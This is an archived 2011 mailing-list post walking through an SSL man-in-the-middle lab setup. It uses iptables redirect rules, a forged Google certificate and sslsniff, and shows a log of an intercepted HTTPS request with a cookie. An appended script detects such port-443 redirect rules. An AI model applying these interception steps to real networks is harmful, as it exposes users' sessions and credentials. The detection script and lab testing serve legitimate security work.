[Emerging-Sigs] SSL MitM with VirtualBox/iptables/sslsniff

Packet Hack pckthck at gmail.com
Fri Aug 5 10:04:43 EDT 2011


I hope this doesn't get on anyone's nerves since it's not directly
sig related, but I got SSL MitM working with VirtualBox/iptables/sslsniff.

Here's how I did it:

 - Set up a VB instance with Host-only Adapter networking, ensuring
   a default route is set to the VB gateway (mine comes up as
   192.168.56.1)

 - Set up NAT, forwarding, & port 443 redirection to 8443:

   % /sbin/iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

   % /sbin/iptables -A FORWARD -i eth0 -o vboxnet0 -m state \
     --state RELATED,ESTABLISHED -j ACCEPT

   % /sbin/iptables -A FORWARD -i vboxnet0 -o eth0 -j ACCEPT

   % iptables -i vboxnet0 -t nat -A PREROUTING -p tcp \
      --destination-port 443 -j REDIRECT --to-ports 8443

   % echo 1 > /proc/sys/net/ipv4/ip_forward

 - gen a fake ssl cert, for say, google, put it in a dir
 - run sslsniff

   % ./sslsniff -t -c crt/c  -s 8443 -w 443.out

 - profit!

   1311727518 DEBUG sslsniff : Read from Client (*.google.com) :
   GET / HTTP/1.1
   Accept: image/gif, image/jpeg, image/pjpeg, [...]
   Accept-Language: en-us
   User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
   Accept-Encoding: gzip, deflate
   Cookie: PREF=ID=[...]
   Connection: Keep-Alive
   Host: encrypted.google.com

Hopefully I didn't leave out any steps. Happy MitMing!

-- pckthck
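
Added example, not part of the original post: a shell function that audits `iptables-save` output for nat-table rules that transparently divert tcp/443, the kind of PREROUTING REDIRECT rule used in the steps above. The sample ruleset is constructed to mirror the post's rules in `iptables-save` format; the function names are hypothetical.

```shell
#!/bin/sh
# Audit iptables-save text for nat rules that divert TLS (tcp/443) elsewhere.
# On a live host (as root): iptables-save | find_tls_redirects

# Constructed sample: the rules from the post as iptables-save would print them,
# plus a port-80 redirect and a filter-table rule that must NOT be reported.
sample_ruleset() {
cat <<'EOF'
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -i vboxnet0 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 8443
-A PREROUTING -i vboxnet0 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8080
-A POSTROUTING -o eth0 -j MASQUERADE
COMMIT
*filter
:FORWARD ACCEPT [0:0]
-A FORWARD -i eth0 -o vboxnet0 -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i vboxnet0 -o eth0 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT
EOF
}

# Reads iptables-save text on stdin. Prints one line per matching rule:
#   <chain> <in-interface|any> <target> <redirect destination>
find_tls_redirects() {
  awk '
    /^\*/ { table = substr($1, 2); next }   # table header: *nat, *filter, ...
    table != "nat" || $1 != "-A" { next }   # only appended rules in the nat table
    {
      chain = $2; iface = "any"; ports = ""; target = ""; dest = ""
      for (i = 3; i <= NF; i++) {
        if ($i == "-i") iface = $(i + 1)
        else if ($i == "--dport" || $i == "--destination-port") ports = $(i + 1)
        else if ($i == "--dports" || $i == "--destination-ports") ports = $(i + 1)
        else if ($i == "-j") target = $(i + 1)
        else if ($i == "--to-ports" || $i == "--to-destination") dest = $(i + 1)
      }
      # Exact port 443, alone or inside a multiport list (ranges are not expanded)
      if (ports ~ /(^|,)443(,|$)/ && (target == "REDIRECT" || target == "DNAT"))
        print chain, iface, target, dest
    }'
}

sample_ruleset | find_tls_redirects
```
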

